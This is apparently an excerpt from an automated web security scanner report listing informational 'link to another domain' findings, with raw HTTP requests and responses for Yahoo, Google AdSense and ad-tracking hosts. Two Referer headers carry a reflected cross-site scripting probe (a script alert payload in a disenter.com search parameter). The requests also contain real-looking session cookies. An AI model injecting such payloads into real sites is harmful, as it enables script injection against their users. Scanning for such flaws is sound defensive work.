GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL29tZy55YWhvby5jb20vbmV3cy9hY3RyZXNzZXMtdGhhdC1oYXZlLXBsYXllZC15b3VuZ2VyLWFuZC1vbGRlci12ZXJzaW9ucy1vZi1hLWNoYXJhY3Rlci1pbi10aGUtc2FtZS1tb3ZpZS81NjE5OQ==&token=eb731ec6c7937dc6538b8f66575ae596 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; tiles=15048; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; aDxT=0.6684604792390019

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:41 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 6125

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

17.105. http://omg.yahoo.com/xhr/ad/LREC/2115823648  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115823648

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:28 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5420

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

17.106. http://omg.yahoo.com/xhr/ad/MREC/2115823648  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/ad/MREC/2115823648

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xhr/ad/MREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:51 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5421

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

17.107. http://omg.yahoo.com/xhr/relatedsearch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/relatedsearch/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xhr/relatedsearch/?p=Elle%20Fanning%2C%20Dakota%20Fanning&uri=/photos/what-were-they-thinking/5203 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:51 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5444

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

17.108. http://pagead2.googlesyndication.com/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0162288744729228&dt=1194350574796&lmt=1194350574&alt_color=003366&format=728x90_as&output=html&correlator=1194350574765&channel=6440035957&url=http%3A%2F%2Ffreenews.maxbaud.net&color_bg=0055AA&color_text=FFFFFF&color_link=ADBACF&color_url=CCCCCC&color_border=000033&ad_type=text_image&cc=99&ga_vid=356766469.1194350575&ga_sid=1194350575&ga_hid=1751073689&flash=9&u_h=864&u_w=1152&u_ah=834&u_aw=1152&u_cd=32&u_his=5&u_java=true HTTP/1.1
Host: pagead2.googlesyndication.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:31:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 11576
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#adbacf}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://freenews.maxbaud.net/%26hl%3Den%26client%3Dca-pub-0162288744729228%26adU%3DAltBinaries.com%26adT%3DUsenet%2BAccess%26adU%3Dwww.binload.com%26adT%3DFree%2BUsenet%2BSearch%26adU%3Dwww.Newshosting.com%26adT%3DTry%2BNewshosting%2Bfor%2BFree%26gl%3DUS&amp;usg=AFQjCNFw01ap9ko3ckVm5oVqAGDGtVknIA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" >
...[SNIP]...

17.109. http://pagead2.googlesyndication.com/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0162288744729228&dt=1194350574796&lmt=1194350574&alt_color=003366&format=728x90_as&output=html&correlator=1194350574765&channel=6440035957&url=http%3A%2F%2Ffreenews.maxbaud.net&color_bg=0055AA&color_text=FFFFFF&color_link=ADBACF&color_url=CCCCCC&color_border=000033&ad_type=text_image&cc=99&ga_vid=356766469.1194350575&ga_sid=1194350575&ga_hid=1751073689&flash=9&u_h=864&u_w=1152&u_ah=834&u_aw=1152&u_cd=32&u_his=5&u_java=true HTTP/1.1
Host: pagead2.googlesyndication.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/search.php?searchString=xss52539%3Cscript%3Ealert(document.location)%3C/script%3Eab8e54a56626fa6f2&enter=Search+Newsgroups
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:34:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 11604
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#adbacf}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://freenews.maxbaud.net/%26hl%3Den%26client%3Dca-pub-0162288744729228%26adU%3Dwww.Giganews.com%26adT%3DNewsgroup%2BAccess%2Bfor%2BFree%26adU%3Dwww.Newshosting.com%26adT%3DTry%2BNewshosting%2Bfor%2BFree%26adU%3DAltBinaries.com%26adT%3DUsenet%2BAccess%26gl%3DUS&amp;usg=AFQjCNGjj_wOQI_hdQ2o7Fj0fw1U_dE0ig" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" >
...[SNIP]...

17.110. http://pagead2.googlesyndication.com/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0162288744729228&dt=1194350574796&lmt=1194350574&alt_color=003366&format=728x90_as&output=html&correlator=1194350574765&channel=6440035957&url=http%3A%2F%2Ffreenews.maxbaud.net&color_bg=0055AA&color_text=FFFFFF&color_link=ADBACF&color_url=CCCCCC&color_border=000033&ad_type=text_image&cc=99&ga_vid=356766469.1194350575&ga_sid=1194350575&ga_hid=1751073689&flash=9&u_h=864&u_w=1152&u_ah=834&u_aw=1152&u_cd=32&u_his=5&u_java=true HTTP/1.1
Host: pagead2.googlesyndication.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:31:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 11784
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#adbacf}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://freenews.maxbaud.net/%26hl%3Den%26client%3Dca-pub-0162288744729228%26adU%3Dwww.NewsgroupReviews.com%26adT%3DFree%2BNewsgroups%26adU%3Dwww.Usenetserver.com%26adT%3DUsenet%2BCosting%2BToo%2BMuch%253F%26adU%3Dwww.ICC-USA.com/2U-Servers%26adT%3DReliable%2B2U%2BServers%26gl%3DUS&amp;usg=AFQjCNFHrtWaAB-3ONfAOJxLPmkjTOWSMw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" >
...[SNIP]...

17.111. http://pagead2.googlesyndication.com/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0162288744729228&dt=1194350574796&lmt=1194350574&alt_color=003366&format=728x90_as&output=html&correlator=1194350574765&channel=6440035957&url=http%3A%2F%2Ffreenews.maxbaud.net&color_bg=0055AA&color_text=FFFFFF&color_link=ADBACF&color_url=CCCCCC&color_border=000033&ad_type=text_image&cc=99&ga_vid=356766469.1194350575&ga_sid=1194350575&ga_hid=1751073689&flash=9&u_h=864&u_w=1152&u_ah=834&u_aw=1152&u_cd=32&u_his=5&u_java=true HTTP/1.1
Host: pagead2.googlesyndication.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/search.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:33:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 3680
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://freenews.maxbaud.net/%26hl%3Den%26client%3Dca-pub-0162288744729228%26adU%3Dwww.inetu.net%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF8GGEy2VMiUq2fA1jFpkD9NJUOpA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/>
...[SNIP]...

17.112. http://pagead2.googlesyndication.com/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0162288744729228&dt=1194350574796&lmt=1194350574&alt_color=003366&format=728x90_as&output=html&correlator=1194350574765&channel=6440035957&url=http%3A%2F%2Ffreenews.maxbaud.net&color_bg=0055AA&color_text=FFFFFF&color_link=ADBACF&color_url=CCCCCC&color_border=000033&ad_type=text_image&cc=99&ga_vid=356766469.1194350575&ga_sid=1194350575&ga_hid=1751073689&flash=9&u_h=864&u_w=1152&u_ah=834&u_aw=1152&u_cd=32&u_his=5&u_java=true HTTP/1.1
Host: pagead2.googlesyndication.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/search.php?searchString=xss52539%3Cscript%3Ealert(document.location)%3C/script%3Eab8e54a56626fa6f2&enter=Search+Newsgroups

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:34:40 GMT
Server: cafe
Cache-Control: private
Content-Length: 11592
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#adbacf}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://freenews.maxbaud.net/%26hl%3Den%26client%3Dca-pub-0162288744729228%26adU%3Dwww.Giganews.com%26adT%3DTry%2BUsenet%2Bfor%2BFree%26adU%3Dwww.Newshosting.com%26adT%3DTry%2BNewshosting%2Bfor%2BFree%26adU%3DAltBinaries.com%26adT%3DUsenet%2BAccess%26gl%3DUS&amp;usg=AFQjCNFCvXaFKi3E4HiFyfBi66Ue7_5r6Q" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" >
...[SNIP]...

17.113. http://pro.tweetmeme.com/button.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.tweetmeme.com
Path:   /button.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /button.js?url=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&style=compact&service=bit.ly HTTP/1.1
Host: pro.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4e711fdbe071e7.74387718-77ae10737605aa42c6d7ecff2ae753b4

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 17 Sep 2011 00:55:03 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Url-Lookup: OrAdd (44)
X-Pro-Served-In: 0.0018379688262939
X-Served-By: h02
Content-Length: 6464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <meta content="tex
...[SNIP]...
</style>

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/3.1.1/build/yui/yui-min.js&amp;ult/ylc_1.9.js"></script>
...[SNIP]...

17.114. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653? HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://bit.ly/n8AAWP
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:35:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 137
Date: Sat, 17 Sep 2011 01:35:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:35:29 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://bit.ly/n8AAWP">here</a>.</h2>
</body></html>

17.115. http://search.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?p=xss&fr=ush_on_omg&ygmasrchbtn=Web+Search HTTP/1.1
Host: search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:53 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: sSN=S.z71v42wWEd8IkrDNTSF4z4HfduzcJvMR.qh2he3jJWUHrogBZZsyddfKXoaCSftpnljkatdq7LaTnttAxYUw--; path=/; domain=.search.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 39043

<!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var pL=0, pUrl='http://ybinst0.ec.yimg.com/ec/fd/ls/l?IG=4a06753004154c2fae4e73f019206d4
...[SNIP]...
</title><link rel="stylesheet" type="text/css" href="http://a.l.yimg.com/a/lib/s10/srp-core-css_201109121735.css"><style type="text/css">
...[SNIP]...
<li><a href="http://ebm.cheetahmail.com/r/regf2?a=0&aid=497540725&n=11&PROMOCODE=US2117&o=US2117&_vsrefdom=yahooseemsghere">Advertising Programs</a>
...[SNIP]...

17.116. http://secure-us.imrworldwide.com/ocr/e  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /ocr/e

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ocr/e?aHR0cDovL3d3dy5mYWNlYm9vay5jb20vYnJhbmRsaWZ0LnBocD9jYW1wYWlnbl9pZD1GU0l1QUZZRkFnX18mY3JlYXRpdmVfaWQ9Y2xKYUFsb0NCRjBfJnBsYWNlbWVudF9pZD1jRmhYQzFjR0FsOF8mbWVkaWFfdHlwZT1pbWFnZSZjb250ZW50X3R5cGU9Zm0mc2VnbWVudDE9VVMmc2VnbWVudDI9NjIzJmg9NTgzOGE5Y2MyYw__ HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:21 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 282

<!doctype html><html><body><img src="http://www.facebook.com/brandlift.php?campaign_id=FSIuAFYFAg__&creative_id=clJaAloCBF0_&placement_id=cFhXC1cGAl8_&media_type=image&content_type=fm&segment1=US&segment2=623&h=5838a9cc2c&rnd=1316221281" width="1" height="1" alt="" /></body>
...[SNIP]...

